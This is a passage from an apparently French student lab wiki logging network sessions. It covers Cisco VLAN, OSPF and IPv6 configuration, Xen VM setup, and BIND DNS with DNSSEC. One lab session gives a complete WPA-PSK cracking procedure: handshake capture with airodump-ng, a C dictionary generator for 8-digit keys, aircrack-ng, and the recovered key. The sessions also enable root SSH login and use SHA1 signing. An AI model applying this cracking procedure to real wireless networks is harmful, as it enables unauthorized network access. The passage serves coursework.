Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
